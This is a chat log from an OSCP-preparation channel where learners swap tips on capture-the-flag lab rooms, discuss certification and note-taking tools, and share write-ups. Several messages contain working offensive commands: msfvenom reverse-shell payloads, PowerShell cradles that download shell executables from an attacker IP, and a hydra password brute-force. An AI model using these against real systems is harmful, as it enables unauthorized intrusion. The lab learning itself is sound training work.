#offensive-pentesting-path
people pwning the box in 10 mins because they found a vulnerability that wasn't supposed to be there
yes, but the problem is the unintended paths were so obvious it's strange they were not discovered in the testing phase
I don't personally see how HTB can make a large amount of money
That could affect the testing phase
They make a lot of money via recruitment
Companies pay for talent
They have a huge list of users who have proven their ability
But the boxes are often not real life based
Yeah, we're going to trial a recruitment programme in the UK
What do they use for hosting? do they outsource?
Hosting?
What do you mean?
Companies and recruitment agencies pay them to get talent.
I think they use DO
@alpine peak I recently asked a recruiter why they used htb. They said that though it may not be the most realistic in terms of content, it does go a long way in finding people passionate and dedicated to improving in the area
The amount of VIP servers they run can't be cheap
They also got £1.3 million investment a few months ago
So yea that explains it
They get a lot of grants though
I've heard their infrastructure is on ESXi :))
I noticed that also lol
I was actually going to mention that
They still live in the dark ages
Yeah
When my chall got accepted, they didn't even notify me
That's annoying ^^
I found out when someone DMed me asking for hints
You made a challenge? @toxic temple
All it needed was an automated email at the least, telling you they're using your material
Yeah
Do they go by ranks? Because people sell writeups for active machines?
Yeah I heard
Like, as soon as you hit that submit button it might as well be theirs
For some lacking categories they might pay, but that was a small thing that I've no idea if it went anywhere
Eh, oh well. It's a good platform but like all, has its flaws
offsec's system works because of the large investment put in to access the labs, and that prevents stuff like selling writeups from happening, and offsec has a large legal team as well. When you make something like machines open to the public, it creates a black market for answers to improve credibility, like ranks
^^
It lowers credibility in my eyes compared to something like offsec labs
I think the way TryHackMe is being built out, we should provide beginner level material and then custom harder weekly challenges. We will have a good mixture of independent challenges and walkthroughs.
My chall was one of the easiest that they've put out yet and I had omni's DMing me for help
Oh right
Omni might as well mean nothing at this point
Wait for real? @toxic temple
Then their system is a bit flawed
I've met omnis that have never programmed before
Yeah
That's really interesting to hear
"Are you sure you're omni rank?"
Tbh I know a few omni who to this day I'm convinced flag shared for rank
He was
A massive flag dump for all boxes happens about once every 6 months or so
Yeah, if I was 100% serious about the challenges, I'd implement randomised flags
Once I focus on more advanced stuff for thm
Stuff like that just drops the credibility, that's why I am surprised companies use that for validation
I'll add it in
It's not just flag sharing, it's the community, they give answers away to stop people from asking for hints over and over
The discord is something else as well
I reckon they're gonna push into the edu space
New features etc..
Perhaps migrating to cloud?
Yeah probably
Offsec is doing that
@toxic temple they already have, Uni event in a few months I think - If you are talking about HTB still
They're also picking up teachers to be "content delivery managers", whatever that means
I mean it's a good move - we're doing it with hackback
Oh yeah, Shawn went into thag
That*
ye
As long as ippsec is still making videos, then I like HTB
He set a meeting up with me, then never turned up and blanked all my emails.
It's fine, the school is saying that I did HackBack2 on the website when in reality I had quit at that point
Out of interest, what do you want to see more of on TryHackMe?
Less walkthrough rooms

We have a room guide coming out soon
That would be helpful
I don't think I'm experienced enough to really do that though
I think thats more a Linux/Windows thing
Like Basic system administration
I just tell people to go to Red Hat or Linux foundation for that
Oh ok, we'll look into developing a new pathway
For SysAdmin type stuff
Not sure how it would fit
Or if a Linux Basics pathway is needed
I would make that
Linux Basics?
Yea
The Linux Foundation Certified System Administrator exam is ideal for candidates looking to validate their Linux system administration skill set.
base it on that
takes notes
I have to agree with zayotic on the less walkthroughs
Okay noted, I'll ensure the weekly challenge is less walkthroughy
Given the amount of messages in this channel this chat is very much a success lol
I'll consider making chats for each of our major paths
ngl, when I saw that there was a new path I got excited, until I realized that there's only one room that I haven't started yet
@topaz yoke please organise the server a bit. Everything just gets thrown under Text Channels though stuff like cyber-advent and oscp-path could easily have a folder to hold them
my ocd dies
I'm breaking that out once I'm back from work, I'm going to split it into a rooms category and a general category
Sweet ❤️
I had considered doing it last night but held off just to confirm this channel was going to be used
so hey, anyone have an issue with the "Using the nmap flag -n what will it not resolve?" answer not working?
lol nevermind. I can't type
Type Harder
not a bad start today
Skynet done, now back to HackPark
Ey, amazing
hey just joined the OSCP learning path, hope it's worth it! Have to retake the exam next month
Welcome! @honest jackal
@honest jackal you gonna crush it
hope so... lost my nerves last time, it was so embarrassing xD
Sorry man :( but you've got the support of THM this time :) @honest jackal
Have a shibe of encouragement
And by that Pars means, you gonna get it this time.
We got your back :+1:
thx all
How long does it usually take for writeups to be approved?
Depends on the room owner
Ahh okay thanks
Okay, I've been stuck on this for about an hour and was hoping someone could provide some assistance. I am currently working on Hack Park, I have obtained a shell and am in the process of attempting to elevate my privileges.
I already created my payload using msfvenom, and when I am trying to download the .exe file from my box using powershell, the file is nowhere to be seen?
powershell Invoke-WebRequest -Uri http://10.8.20.76/shell2.exe -Outfile sh222.exe
is the command I used, and on my kali box running the simplehttp server, I see the 200 response from the victim box for the shell file, yet the file is nowhere to be found. What is going on?
@foggy heath powershell "IEX(New-Object System.Net.WebClient).Downloadfile('http://10.10.10.10/shell.exe', 'shell.exe')"
ty, I will try this when I get a chance -- I think I killed my box.
@alpine peak Still didn't seem to work -- for this command, I don't even see a response on the tab running my http server. Before I was able to see 10.10.215.78 - - [27/Jan/2020 22:26:55] "GET /shell2.exe HTTP/1.1" 200
do you have write permissions to the directory?
Why
that's probably it -- thanks
I forgot to add IEX
@alpine peak Is there an easier way for me to test if I have write permissions in a directory instead of just mkdir text?
well, Accesschk exists, but I don't think it's default anymore with Windows
Still could transfer the binary
And I think powershell has Get-Permissions
TY, i was able to get my shell file to be uploaded -- now I know, check for permissions for write @alpine peak
Hello all, I started the path and I noticed something wrong with this question in Vulnversity. If we are talking about who is actually running the web server, it's not the user that is supposedly the correct answer, in my opinion (I may be wrong)
web server=/=server in this instance
web server is just who's running the web server service, in this case Apache
If I remember, it's asking for a user and not a service account
For the Jenkins room, I currently have a reverse shell, created my payload using msfvenom (exactly as instructed), set up my multihandler, was able to successfully move the created payload to my victim machine, but when I run it, I don't get a shell on my listener while it's running? Any ideas on what might be the issue?
Sorry, I meant to say for the "Alfred" room
@foggy heath What command did you use to run the exe?
Start-Process "poc.exe"
what directory?
Ahh -- I'm running it from C:\Program Files (x86)\Jenkins\workspace\project>
are you the bruce user?
yes -- i'm guessing I need to move into a different directory
Try the desktop directory
Hmm, no luck~
Are you using nishang?
but I guess I should try looking around different directories. Well, I already used nishang to get my initial shell. In the steps it told me to create a msfvenom payload
which I did, I re-read everything to see if there were any typos
You don't have to, but it's just easier using staged
ahh -- I see
What command did you use to download the exe
powershell "(New-Object System.Net.Webclient).Downloadfile('http://IP-address:80/poc.exe','poc.exe')"
I was able to see from my tab running the server the file was downloaded
additionally, I saw that the file was pulled onto my current directory
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f exe -o meterpreter.exe
did you use that command
yeah, that's exactly what I used (with the exception of the lport and the file name)
ohhh
i set the payload to windows/x64/meterpreter/reverse_tcp
but I also set that same payload on my multihandler
at least that was what was directed in the instructions
essentially this was the exact command given to generate the payload
msfvenom --platform windows -p windows/x64/meterpreter/reverse_tcp -a x64 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -i 3 -f exe -o [SHELL NAME].exe
It's useful if dealing with 64bit kernel exploits
which I think generates the correct payload, as one of the questions asks me for the exact file size of the payload
I just ran systeminfo to make sure -- the machine is x64 so this payload should work against it.
I don't remember what I did
unless I am missing something~
That's fine -- i might need to hang it up for the night, i've been stuck at this part for almost good 3 hours now.
hold on
I breezed through the first steps but seem to be getting stuck here... Just to be sure, I need to set my multi/handler to the same port I specified in my msfvenom payload
kk, i'll hold on
msfvenom -p windows/x64/meterpreter/reverse_https -f exe LHOST=10.10.10.10 LPORT=443 -o shell.exe
Yeah, I must be doing something wrong or have missed something small/simple .. my brain is a bit fried... maybe I'll see my mistake after some shuteye
yea
I created the new payload, adjusted my multi/handler appropriately, ran it
then executed the payload with the Start-Process file.exe command
but get nothing~
not in quotes?
sorry, I did both
in quotes first, then tried without
I would need to set my LPORT on my multi/handler as 443 correct?
yes
man... yeah, no clue what's going on. I even tried terminating/re-deploying the box thinking I messed something up the first time around
got back to the same step on the 2nd, fresh box
i've triple checked my commands/options in the payload, my IP configs, payload options~
@foggy heath I'm heading to work rn but I can DM you a little later?
@Ashu Is it okay if I DM you in about 6 hours? about to get some shuteye
been at this box since 9:30PST and it's past 1AM now~
Yep that's fine :))
I finished Jenkins last night and yeah it's easy to make a typo somewhere and not get a meterpreter back. I should have documented this box but: make sure your exploit is built for x64, that you're using quotes in the right places and running your commands in the right shells
hello all,
hello all, I just started Vulnversity but I think there is an issue with deploy. I tried to deploy the machine multiple times and it shows a message that the machine started but the machine never starts!
After clicking deploy (or if it still says it is already deployed), try refreshing your page and see if its information is now showing up at the top?
after clicking deploy it shows the message "Starting your machine.. please wait!" but nothing deployed. When I refresh the page then I'm able to click deploy again but unfortunately it doesn't deploy.
I just did a quick test and it deployed for me. When you refresh and click deploy again does it say it's already deployed or the "starting your machine" message again?
it shows the same message Starting your machine.. please wait!
If I failed to ssh into a machine several times and it refuses my connection from then on, is there a workaround? Is there a way to figure out how long it might lock me out for, or if the lockout is permanent?
Possible to mask/change your IP?
ahh, thanks!
Is there possibly something wrong with the metasploit box? I seem to not be able to migrate processes, or even use the webcam_list command?
I couldn't do those either
Figured it was a problem with my metasploit framework though
webcam_list can be blocked
What you guys thought about oscp path
By doing and completing it, can it guarantee you'll pass the OSCP exam?
No
Nothing can guarantee OSCP
At the end of the day you're the one taking it, nobody else is gonna do it for you
Completing the path without help from any walkthrough could increase your chances
The exam is cut throat, can't figure it out on your own? You fail
I mean, does it give you an understanding of how the exam looks, being similar to the path?
The closest you'll get to the exam is the offsec labs
The exam machines change all the time. What I do know is that the machines are designed specifically to make the attacker understand the exploit and be able to modify it to work for the machine, and to be able to google enough to understand how it works
The PWK labs are not at all like the exam
For example: if a vulnerability exists but a public exploit relies on a specific service to obtain RCE because that's the most common use, they want you to analyze the info you already have and be able to use that vuln in another way to gather info you know for a fact exists on the machine already.
The path was developed with this in mind, so that's why I said if you root them without any help, because that's the closest simulation you will get
Yeah, I'm 66% done with this path but the stuff you do only covers so much of the PWK syllabus
You have to use a lot of resources to "guarantee" a pass for the exam, not just this OSCP path
The path is for methodology building, that's what the PWK is for also
Yup, and it's done a good job at that so far
anyone else having connectivity issues?
#site-support @frail vine
@frail vine I think (if its the same user I'm talking to on Twitter), this is ok now
I'll add another OpenVPN VIP server in
Is the OpenVPN VIP server automatic or does one need to do something to be using that server?
@spark iron yeah it's a me
I have a question: on the OSCP path challenge Kenobi task 3, why do we connect using nc on port 21? Why use nc for this FTP port?
you can interact with FTP servers through a command prompt
NC can sneak some files in, and a bit of remote code if a shell is set up correctly, there's a few HTB machines that offer that method I believe
I have no shame using walkthroughs though. At my level I need that instruction for a bit while I can work on getting the very basics of offense/defense.
I really wish there were more machines or labs to exercise Incident Handling/Response and Threat Intel. That's the route I want to end up at but a lot of these companies I've been able to talk to are looking for a hell of a lot of experience
Need help on hackpark task 4
I already created the shell using msfvenom and I have an nc session on the machine
I can't upload the shell.exe to the machine
I can see the log in my simplehttpserver
But the file is not uploaded when I type dir
fully specify the outpath
Hi, new to the server :)
I've started the OSCP PREPARATION path and noticed that "#5 What user was running the web server?" doesn't seem correct in the (question) statement. It means the user running the web server/service which is not the answer accepted as correct.
also make sure you have write privileges to the given location
or is this is a known "bug"?
I don't know the answer off the top of my head, but put what you think in ||here||
here being ||||
the answer is 4 dots, which is not the user running the web server
it was the user for "#6 What is the user flag?"
I got the answer correct after some attempts but just think the question is stated incorrectly for #5
@crimson flame I don't get what you mean
You can check the powershell command I did,
Is this correct
powershell -c "Invoke-WebRequest -Uri 'http://<ip>/shell.exe' -OutFile C:\Windows\Temp\shell.exe"
not fully specifying the outfile-path can lead to some issues.
your shell could also be picked up by AV if the box has it
In Linux there is no AV and the shell is in my home directory
On the target machine, not yours.
193.168.1.3 is my local server IP, the target machine should not have AV?
They're saying you need to specify the full path of where you want the shell.exe to be placed on the remote machine
Hence the "-OutFile C:\Windows\Temp\shell.exe"
Ok great, it's working now after I edited the command, thanks for your help
hey all, I posted another writeup in my series for the path
I must have googled the whole internet, trying to find the (MS-xx-xxx) patch for a CVE, but without luck
any pointers in the right direction would be nice
solved
It's in my blog @ www.pwndefend.com re CVE reference for the non metasploit one
I was looking at the wrong service but thx
I may be crazy but I can't see the oscp path under tryhackme.com/paths
it's there
for some reason I only see the red/blue primer series like normal. nothing else is on the page
oh interesting. I had to leave the red/blue primer series to see the other paths to join one of them
anyone done HackPark? I'm at Task 4 and #4 but for some reason it's not triggering
Already figured out
still no one?
@burnt walrus \o
hey
If you haven't figured it out yet
yea
What's up?
Question is about?
ICE, Dark's room? I haven't done it to be honest.
dark pc yea
What's the question though?
I can't find the version of that thing
Ah, the first question?
Use ||nmap -sV -sC -A <ip>|| and analyze the output thoroughly. @burnt walrus
Sure do and let me know.
no, it's not giving out the details of the port
is there a glitch?
Can you show the full output of it in DM? @burnt walrus
alright
hey everyone my latest OSCP path walkthrough is online! https://www.pwndefend.com/2020/02/02/try-hack-me-part-3-alfred/
I got it all but I left task number 2 in Steel Mountain, action 2; I know the file server and everything but the answer is wrong
Hn0s from rf?
@thin walrus yes, I had problems with task 2 in Steel Mountain too. The answer for this question can be found if you search up the CVE number in a CVE database, for example cve.mitre.org
Lol
@bronze zenith thanks, I think they should fix some typos
Sometimes I notice there is something not clear with the question
hey guys, I am just starting to do the OSCP prep path and I was wondering if any of you had advice on a note keeping tool.
I have a suggestion: since the path name is OSCP, the steps, info and hints shouldn't use Metasploit. They should redo this path; in most of the rooms I see pictures and the use of Metasploit
@devout violet use cherrynote
It comes installed in Kali Linux
If that's Cherrytree you're meaning, then I second that. Best tool in the game
I was looking it up. Can I move the notes I create onto a USB or by any other method using CherryTree?
FYI: I currently use KeepNote but moving the notes to another medium is kinda complicated
joplin is pretty good too
You can import most anything; there is an option called tree, then choose import
Node
Then you will find your option there
I've not heard of that one @toxic temple. Does look pretty good, although I reckon Cherrytree is too ingrained for me to switch!
KeepNote currently (as far as I know) only imports to HTML. I was looking for something along the lines of Notepad or Word, in case I wanted to move it.
thanks for the advice...
Yes it's a good one, I have created a good template for it
Oh that's cool
but, am I the only one who rarely uses notes and keeps it all in mind? ahahahaha
I only do those in real-life work lmao
You have to take notes when you do CTFs etc. based on your writeup and understanding; one day you will find it useful, it will save you time sometimes, and it makes everything clear for each step
Speaking of notes, does anyone have some recommended note-taking tools they like? Rather than doing what I currently do with a directory with a notes file in it, wanting to look into something more useful for note-taking while practicing on boxes
I use Notion but everyone has their own preference. CherryTree and KeepNote seem to be the popular options
I suggest going through some rooms with a tool each and see which you like
Oh, guess I'll need to track down those rooms then!
I think I saw someone using cherrytree before, might see how I like it
if you're a Windows host user, OneNote is good as well
you can use onenote from a web browser as well. I mention this as some companies use o365 to store customer data so it's a useful tool to get to know from an IRL perspective
hai all! Here's part 5 of my OSCP path writeups! https://www.pwndefend.com/2020/02/03/try-hack-me-part-5-game-zone/ hope it's useful to some! :lightsaberpepe:
"Try upload a few file types to the server, what common extension seems to be blocked?"
How is this not guesswork?
@glass pine It's expecting you to try uploading "normal" file types. I reckon I can hazard a guess at which type it is -- probably in Vulnversity?
If that's the case, what file type would you first try to upload to get a reverse shell when you're presented with the options you have been?
@glass pine you would use automation assisted approaches
e.g. in Burp Suite you would use the Intruder tool to load a range of tests to check extensions
it's not guesswork per se.
much the same as when you might be injection testing, you would use a combo of wordlists to attack a form then investigate response codes etc.
you can script these with python or use a tool such as ZAP or BURP
Great next step after realising there's a problem ^^
Debatable whether it's the first thing you should do when you see a file upload though.
first thing...
i don't think the paths are intended as first thing
they are the route to r00t more than a teaching of the full testing process
Nah, as in, if you see a file upload, do you try uploading something first, or do you immediately open Burp and start testing it? I mean, I guess some people might -- it may even be the recommended course of action, but it's a bit overkill for answering that particular question.
Each to their own, I guess, but, whilst that's definitely the way forward for the next question, I wouldn't be reaching for it to see which common file extension is blocked.
As I said, it's totally up for debate as far as I'm concerned.
ok if I see a file upload the first thing I do is try and upload a non malicious file as a normal user would
i would then upload a second one
non malicious
i would try and work out what the storage path was at the backend
i would see if I could link directly to it
I would then try and upload different extensions
so it's very near to the "what I would do" path
Exactly...
You would try to upload files first. When you realise that what you're trying to upload is blocked, then you would enumerate it to see what extensions are not blocked.
You wouldn't use Burpsuite before trying to upload files yourself.
Intruder for that right?
intruder or repeater
Intruder for using word lists or iterators etc
I would normally try not to abuse an app before I knew how it worked as well
IRL you're on production systems
just spewing payloads isn't always a great idea
Great work daniel
Just feedback, don't use Metasploit in the writeup; we want to make this path better and follow OSCP style. It allows one, so I hope the admin takes this feedback seriously
It's a per box restriction, not a one time usage thing.
So you can use it as many times as you like on one single target
Side note: this page is quite good for the major PWK exam talking points https://support.offensive-security.com/oscp-exam-guide/
@thin walrus you can use the handler as many times as you want. You can only just use an exploit module once etc.
if I've used a module it's likely because there wasn't a script based exploit (soz, can't remember as I've done lots of writeups :D)
in the PWK labs you can use MSF exploits and I try to show the routes without if they are available
(and thanks dude!)
Morning all! I've got another writeup posted on this path for SkyNet! https://www.pwndefend.com/2020/02/04/try-hack-me-part-6-rise-of-the-machines/
In this latest room (box) we take on Skynet! This box has a cool theme and was fun to play through. https://tryhackme.com/room/skynet This room starts to move away from the guided path and has far fewer flags, but it retains more than just a two-task approach to keep the pers...
Hello all... What can i do when my kali remote connection freezes ?
Don't select a language when it asks you
Just close the window
It's a known bug
It's on my to-do list to fix
I will fix it this week
I see, thanks
Hi, I'm on the HackPark room, I have already got root access via a CVE, however I would like to exploit the abnormal service, and I'm not sure I'm doing things right :/
I have tried to overwrite the binary but got a permission denied, and I tried to modify the registry key but without success, so am I going in the right direction?
Finishing up Blue room, but no flag2. I have terminated/deployed 3 times and followed all steps to include upgrade to meterpreter, getsystem, etc but no flag2.txt. Pretty easy to find the others with "search -f flag* -r -d"...and I see the flag2.lnk which shows the actual location...but it's not there. Anyone else having this issue? I even checked the write-ups and they confirm the location...but it's not there after 3 reboots. Any advice from anyone? Can someone at TryHackMe confirm this room is still set up correctly or perhaps provide advice?
@hushed bluff try it one more time. If it still isn't there (and you've double checked the writeups) let me know and I'll grab it for you since you've clearly learned the concept of what I was going for
hey, anyone else get stuck cracking the password on Blue? I have it cracked I think but it's not being accepted. Anyone wanna throw a hint my way? I'm about at my wits' end (very new)
@topaz yoke Thank you, I will run through again...actually it's not been a bad experience repeating, I am getting reps on msf!
@tardy basalt I used hashcat, since john did not work right away.
with the rockyou.txt wordlist
yeah that's what I'm using. Did you get a hex result and have to convert to ascii?
@tardy basalt Let me DM you with some hints.
cool
practice is always good ❤️ @hushed bluff
hello guys... those who did HackPark, I have a small issue on the privesc exploit, can I have a nudge plz?
anyone around?
have a question in Blue regarding flag2 and flag3
guess I'll move on till someone can answer it
@burnt walrus if you still need help dm
@spark iron you online?
yea
Skidy is actually an extremely sophisticated piece of AI technology who is always online
Just @ people and post your question
this isn't HTB where help is kept secret in the DMs
We like to keep Q & A in the discord so any other people that have your issue can reference the solution
Although don't post any flags, passwords, etc. Or at least keep spoilers in the spoiler tags.
Anyone else find 11 ports open in Kenobi? The correct answer is less, but after running the scan twice I still get 11.
wow 11?
I didn't get that many
anyone doing the hydra part?
ran in to a problem need to verify
@burnt walrus What room are you using hydra?
@hushed bluff Do any of the ports show as "filtered"?
@fleet wedge Thanks for following up. I use --open to keep the results clean. When I went back to look at the hint, I believe the intent was to not specify all ports (-p-) and let nmap default to top 1000. I ran -p- and got 11, but the correct amount for the question is all ports below 1000, or standard services.
No worries, moving on.
good for you that you used the -p- option, that's the best practice way to scan imo
you never know when you miss an important port only because you leave nmap default settings to do the work
@burnt walrus I am not there yet, but have used hydra before, what is your question and I try to help
is it a GET or a POST...did you review the request/response in Burp Suite?
yea post
hydra syntax might be a pain in the ass if you don't have experience with it
totally agree
you can share the command here and we will try to help you with it
hydra -l admin -P /usr/share/wordlists/rockyou.txt http://10.10.12.188 http-post-form "/Account/login.aspx?ReturnURL=%2fadmin%2f:UserName=^USER^Password=^PASS^:S=logout" -vV -f
so this is the command I'm using now
it's attempting now
this is gonna take a long time, isn't it
oh well, didn't work
hmm
Ok, just finished kenobi...but had to use someone's writeup from PWNDEFEND.com to complete the final section since I could not understand based on the room directions...I had never used "strings" so the wording and screenshot did not connect until later. My question is: if there are two "curl" binaries (the normal one at /usr/bin/curl, and the one I created in /tmp...which is really /bin/sh) and both are in PATH...how do I know which one will execute?
Is it because I ran /usr/bin/menu from /tmp? I guess this is a question of the logic of PATH and how binaries are executed.
@burnt walrus https://null-byte.wonderhowto.com/how-to/hack-like-pro-crack-online-web-form-passwords-with-thc-hydra-burp-suite-0160643/
kali > hydra -L <username list> -p <password list> <IP Address> <form parameters><failed login message>
Working on HackPark and looks like there is one URL parameter and 5 other parameters in the body of the POST request that should be used in the <form parameters> section.
thnx @hushed bluff
@hushed bluff doesn't work like that. I have figured it out. thnx for all the help
anyone have issues running PowerUp on Steel Mountain?
anyone give me a hand with Daily Bugle?
its really slow
with SQLi
had it working fine yesterday but couldn't find the hash anywhere!
65 pts after 10 hours. I should have done the lab report
If you're still needing a hand @dusky dust, feel free to DM me with the command you're using.
Currently in the middle of a write-up for that room as well, so hopefully that will be out soon too
better than school
any guidance on Daily Bugle? I'm stuck where others are as well with the apache shell. saw the chatter today about using linpeas over linenum, but didn't manage to find anything new with it
@wispy jacinth DM me if you're after a hand. If you'd prefer to trial the write-up I'm in the final stages of publishing, that's an option too
sure, if you've got something you can point to, I'll take a look
been working on it for days now in between taking breaks and thinking through stuff
That's fair. Getting user is a pain.
Gimme ten minutes to get the images in and press the publish button
I wouldn't normally have worked on a room this high in difficulty yet, but it's in the OSCP path after a handful of easy rooms, with a description that remarks I should be able to do it after working through the others
maybe after some help with next steps, I'll better understand what I was supposed to have learned from the previous boxes in that part of the oscp-path to be able to tackle this room. for now though, I'm struggling connecting the dots
To be honest, this step is one you're probably going to kick yourself over. There's no big "hacking" concept you're missing. It's literally just down to closer enumeration.
yeah, just take more time, read. Might be a little tedious, but youll get there
dang, not what i wanted to hear. i wanted to hear how it required writing custom c to overflow a buffer in vestigial code from '92
Hehe. Nope -- no such luck I'm afraid. Here's a hint though (without spoiling it totally) ||take a look in /var/www/html -- the webserver has something to offer||
ok, i think i may know what you're referring to
and i've already got that string
but...that's just for the backend?
Is it though? Is it really?
There's a lesson to be learnt here: don't reuse your passwords...
i guess i made a poor assumption there
i've been sitting here for an hour trying to find privesc vulns in that version of the backend ...
Hehe - nah, not at all. To be fair, the complexity of that password makes it unlikely that it's been reused. You can't be faulted for not jumping to that conclusion. I think that's an issue that's already been raised with the admins
actually, wait, that's not true. i did try to ssh in as root with that pass and it didn't work
Yeah, it's not the root pass
try it other places
It's better to enumerate with width before going down rabbit holes
If it's any consolation (and this is testament to exactly how tired I am) -- not only did I not save one of the screenshots I took, I subconsciously got around the hole in my numbered image sequence by saving the next one twice...
dangit, well, i suppose this could be somewhat realistic
there's definitely a lesson here for me
77.5 with 8 hours to go
@wispy jacinth I'm assuming you'll be fine from here, but this is a link to the write-up should you need it: https://muirlandoracle.co.uk/2020/02/08/daily-bugle-write-up/
i just finished escalating to root, woohoo
@chrome valve writeup looks good and mostly what I did. i didn't know quite what table to use with sqlmap, so i had more steps in there trying to determine that
also had issue with the gtfobins like you wrote about
Good to know it wasn't just me having annoyances with that privesc. It's easy enough to do -- just can't be automated for some reason.
i found a helpful medium article that walked through installing fpm and using that to build a reverse shell using /dev/tcp/ip/port --> rpm
Yeah, I looked at that on gtfobins and basically decided it was too much work
thank you for the guidance and the good writeup
No problem, and thanks!
tfw the description says to attempt the daily bugle in an hour but I took a week...
All good practice though!
Exam done... but I'm too caffeinated to fall asleep and too lazy to polish my report
@chrome valve great write up bro! I learnt a new tool from that, CMSeeK, which is cool. I used joomscan, well, first of all I tried to manually find the version, which I did. Then I used joomscan, but I like the all-in-one that CMSeeK offers.
Also how did you get gtfobins in a terminal like that I have always got it up in a browser! Haha
@chrome valve ayy you got your writeup out, nice!
@keen iris Took me until 4AM, then another hour and a half to get the VM finished to include that new vulnerability, but so worth it!
@dense gale Thanks! I do like CMSeeK
Getting gtfobins into the terminal is actually a tool from our very own @autumn nova, so full credit to him for that. It's in his github, here: https://github.com/mzfr/gtfo
Awesome man thank you so much!!
Wish I knew about that yesterday
@real sandal The exploit, the Write-up, or the terminal gtfobins?
Hehe -- it's a great tool
Hi all
I get a very unstable shell when I replace the ASCService.exe for the Advanced SystemCare service
It is on the Steel Mountain room
You need to spawn a new shell
So when the shell loads have another shell prepped to fire
You can see that in the write up I did I think
Hmmm
I can't find my write up lol
Maybe I have another to publish
@real sandal @chrome valve planning to add the option to search exploit-db in that tool
Even though there already exists searchsploit
But might be helpful to just have one tool for all of that
Hmm the issue for me is that searchsploit is very much in my muscle memory at this point, unless there was an alternative that improved the annoying parts of searchsploit
i.e. be able to download files by referencing the number in the result list, like Metasploit, instead of having to copy the EDB path
You could always set yourself a challenge to make a script that does that using awk or something
That could be cool @autumn nova! Would that be using the searchsploit local files or just doing it online? Could be useful if it could tell us if we already have the file downloaded locally.
Well searchsploit has like the whole db so it just searches locally
Mine might just keep a copy of the CSV files that have the record of vulns and with that it would give the URL to the exploit
But yeah adding a download option won't be hard
Yeah, exactly!
Out of curiosity, would you be able to search the remote one, but also check if the file already exists locally in the searchsploit db?
Core concept would be easy to do local searches. However, it wouldn't be too difficult to provide remote searches
Should definitely be possible, just in terms of how @autumn nova wanted it to operate.
Hi All, for the Alfred box, the meterpreter shell is uploaded to the host for the shell upgrade. But the Start-Process "shell.exe" does not pop me a shell in the msfconsole handler. Tried to listen on netcat as well, no luck. Can someone please help me out
hello all i am looking for a binary exploit for this issue MS16-032
can anyone help me
?
Anyone around to discuss hackpark?
The priv esc mainly
@deft gale @burnt walrus dm if ur still stuck on that part
@true quiver you're everywhere
my goal is world domination
anyone can help me with hackpark?
Anyone that finished brainstorm able to chat?
can you just ask your questions?
100% okay to share knowledge and help eachother in this discord
do not be afraid to not ask questions!
to*
I'll try. I've been using wine and ollydbg combo to reverse engineer the .exe on my kali box. I'm able to overflow the buffer and have control over eip. The room seems to hint that the .exe was compiled with ASLR and DEP protections but when I try to confirm by running the binary through a few tools, all say that aslr and dep are not set.
Is there a standard way to confirm this on a Linux os?
The reason I'm trying to check is that I have set up my payload to include a nop sled and shell code trying to see if I can execute the shell code right on the stack. When I run this through the debugger, the nop sled, shell code, and eip overwrite get set up correctly but when the _Overflow function returns (with the overwritten eip) the stack section that had my shell code gets overwritten with a bunch of \x00s which makes no sense to me
have got root.txt on hackpark but have a question on whether it was the intended way if anyone is about
anyone around?
this is the problem Im facing in hackpark
can anyone give me a solution
ok no need got it
is there a stability issue on Hackpark? the server keeps going down and up
on hackpark i think i ended up using a c2
but i think you can get round that by using the full path on the outpath paramater
gang apologies i haz 2 moar writeups i didn't post
hackpack and the mr robot one
i need to edit them and write them into blogs not just notes so they won't be out this week
@frail vine what c2 you mean
i might have used covenant C2 or POSH c2
For post exploitation?
You gota make a short video for covenant c2 introduction many people dont know
yeah ok
empire 3.1 is ok as well
sometimes u need a tool that is proxy aware
metasploit shells aren't proxy aware
so u can't use them in non routed/adjacent network positions
PWK got updated https://www.offensive-security.com/pwk-oscp/
Working on machines for the updated syllabus
yep sadly it takes up to 3 business days to get the content.... So bought the upgrade but have not gotten it yet
oof looks like its 5 days for people buying now
Looks like there's a lot of excitement about the new PWK. There's a lot of really cool stuff on the syllabus :)
Guys I need your suggestion, I'm planning to buy a subscription for tryhackme and start the oscp path, how is the course content in tryhackme?
yeah, that's a good idea! My advice would be to complete a couple of free rooms beforehand (for example RP: Nmap and Metasploit) so you have a basis for your studies. But all in all, the path is structured in a way that you start from step-by-step walkthroughs and end up with OSCP like rooms
I'm definitely going to subscribe soon as i have time in the next few weeks. I've been reading up a lot about the changes to pwk and there's a lot of new and cool stuff in it. I think we'll need a few new rooms but from what I hear most of the previous stuff can still get you a viable pass, however a lot of fun new opportunities have just opened up and i think a lot of people will get a kick out of the new tactics
We are happy to inform you that you have successfully completed the Penetration Testing with Kali Linux certification exam and have obtained your Offensive Security Certified Professional (OSCP) certification.
Finally
gz
@real sandal Congrats !! You pass the New version ?
If we already have the cert/course did they update our content?
Yeah exam hasn't changed
You have to pay to get new content whether you're a student or passed
Exam is the same, just additional content.
Yeah but the course changed, that's what I would say, sry
That sucks, like the AWAE, they said they will update and give free exam for those who take it on conf but they didnt
on conf?
Does the OsCp path come with a badge or something to show off on a resume
??
@fleet wedge Completing the path won't really get you anywhere, it's meant as preparation for the actual exam, have a look at: https://cybersecurity.att.com/blogs/security-essentials/how-to-prepare-to-take-the-oscp
@dense gale very few people going to spend a small fortune on that cert or the updated docs and risk their certifications and careers for that. All the pdfs and vids are watermarked with the individual's info.
just wanted to know how different it was compared to old stuff
i have the oscp pdf and it's like 360+ pages and wondered if the new one has loads more in it
one of the guys i work with is doing it soon and he wondered
It's taking 5 days now for people to get the course material so don't think anyone has received the new stuff yet
oh right they still doing the whole "start days are sundays" etc
I think it's more that they're swamped now. It was supposed to only take 3 days but I know people that ordered the upgrade on Tuesday and then OS replies "Ok wait 4-5 days for the materials"
A friend of mine paid for the upgrade. It's 850 pages. Content is similar, more beginner friendly approach (they want to encourage more people to jump in sooner) videos/workbook have both had a visual makeover. Lots of stuff on Windows, good if you're unfamiliar.
That's good. Yeah given the length people were afraid it would take them longer to get into the labs now, but as long as they encourage them to start playing with it while following along in the PDF
ahhhh thats huge!
im glad they're encouraging people new to pentesting in to it, i reckon they've done it to stop people diverting off to courses like elearnsecurity
anyone done any of the Elearnsecurity stuff?
You can see from the official syllabus they push lots of beginner Linux stuff and all that, stuff you should probably have already covered through kali.training or other resources before they dump you into the fun stuff.
Anyone to assist with kenobi mount command...?
@trim vapor sure, DM me
